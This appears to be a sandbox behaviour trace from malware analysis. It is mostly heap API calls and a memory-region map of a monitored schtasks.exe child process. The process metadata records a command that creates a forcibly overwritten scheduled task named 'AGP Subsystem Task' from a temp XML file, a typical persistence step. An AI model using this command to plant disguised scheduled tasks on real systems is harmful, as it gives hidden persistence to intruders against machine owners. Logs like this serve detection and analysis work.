[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cc8) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304cc8) returned 0x10
[0169.839] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cc8 | out: hHeap=0x2f0000) returned 1
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.839] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050e0) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050e0) returned 0x14
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050e0 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305338) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305338) returned 0x16
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305338 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c98) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304c98) returned 0x10
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304c98 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050c0) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050c0) returned 0x14
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050c0 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304f90) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.840] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304f90) returned 0x2
[0169.840] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304f90 | out: hHeap=0x2f0000) returned 1
[0169.840] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fa0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fa0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fa0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fc0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fc0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fc0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fe0) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304fe0) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304fe0 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305000) returned 0x14
[0169.841] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305000 | out: hHeap=0x2f0000) returned 1
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] GetProcessHeap () returned 0x2f0000
[0169.841] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305298) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305298) returned 0x14
[0169.842] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305298 | out: hHeap=0x2f0000) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052b8) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052b8) returned 0x14
[0169.842] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052b8 | out: hHeap=0x2f0000) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306920) returned 1
[0169.842] GetProcessHeap () returned 0x2f0000
[0169.842] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x306920) returned 0x30
[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x306920 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052d8) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3052d8) returned 0x14
[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3052d8 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3069e8) returned 0x30
[0169.843] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3069e8 | out: hHeap=0x2f0000) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.843] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378) returned 1
[0169.843] GetProcessHeap () returned 0x2f0000
[0169.844] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305378) returned 0x14
[0169.844] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305378 | out: hHeap=0x2f0000) returned 1
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314d20) returned 1
[0169.844] GetProcessHeap () returned 0x2f0000
[0169.844] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x314d20) returned 0x82
[0169.844] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x314d20 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305738) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305738) returned 0x14
[0169.846] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305738 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bc0) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bc0) returned 0x10
[0169.846] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bc0 | out: hHeap=0x2f0000) returned 1
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.846] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305020) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305020) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305020 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305040) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305040) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305040 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305060) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305060) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305060 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305080) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305080) returned 0x14
[0169.847] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305080 | out: hHeap=0x2f0000) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.847] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bd8) returned 1
[0169.847] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bd8) returned 0x10
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bd8 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050a0) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3050a0) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3050a0 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305118) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305118) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305118 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305158) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305158) returned 0x14
[0169.848] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305158 | out: hHeap=0x2f0000) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305198) returned 1
[0169.848] GetProcessHeap () returned 0x2f0000
[0169.848] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305198) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305198 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051b8) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3051b8) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x3051b8 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305258) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305258) returned 0x14
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305258 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bf0) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304bf0) returned 0x10
[0169.849] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304bf0 | out: hHeap=0x2f0000) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.849] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305138) returned 1
[0169.849] GetProcessHeap () returned 0x2f0000
[0169.850] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305138) returned 0x14
[0169.850] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305138 | out: hHeap=0x2f0000) returned 1
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ba8) returned 1
[0169.850] GetProcessHeap () returned 0x2f0000
[0169.850] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x304ba8) returned 0x10
[0169.850] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304ba8 | out: hHeap=0x2f0000) returned 1
[0169.850] exit (_Code=0)
Thread:
id = 33
os_tid = 0x4ec
Process:
id = "6"
image_name = "schtasks.exe"
filename = "c:\\windows\\syswow64\\schtasks.exe"
page_root = "0x3b003000"
os_pid = "0x5e0"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0x830"
cmd_line = "\"schtasks.exe\" /create /f /tn \"AGP Subsystem Task\" /xml \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmp17.tmp\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1979
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1980
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1981
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1982
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1983
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1984
start_va = 0x100000
end_va = 0x13ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1985
start_va = 0x1c0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1986
start_va = 0xeb0000
end_va = 0xeddfff
monitored = 1
entry_point = 0xec7683
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")
Region:
id = 1987
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1988
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1989
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1990
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1991
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1992
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1993
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1994
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1995
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1996
start_va = 0x200000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1997
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1998
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1999
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 2000
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2001
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2002
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2003
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 2004
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2005
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 2006
start_va = 0x3b0000
end_va = 0x5dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 2007
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 2008
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 2009
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2010
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2011
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2015
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2016
start_va = 0x70000
end_va = 0xd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2017
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 2018
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 2019
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 2020
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 2021
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 2022
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 2023
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 2024
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 2025
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 2026
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 2027
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 2028
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 2029
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 2030
start_va = 0x74920000
end_va = 0x74928fff
monitored = 0
entry_point = 0x74921830
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\SysWOW64\\ktmw32.dll" (normalized: "c:\\windows\\syswow64\\ktmw32.dll")
Region:
id = 2031
start_va = 0x140000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 2032
start_va = 0x5e0000
end_va = 0x767fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2033
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2034
start_va = 0xe0000
end_va = 0xfdfff
monitored = 0
entry_point = 0xf158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2035
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 2036
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 2038
start_va = 0x770000
end_va = 0x8f0fff
monitored = 1
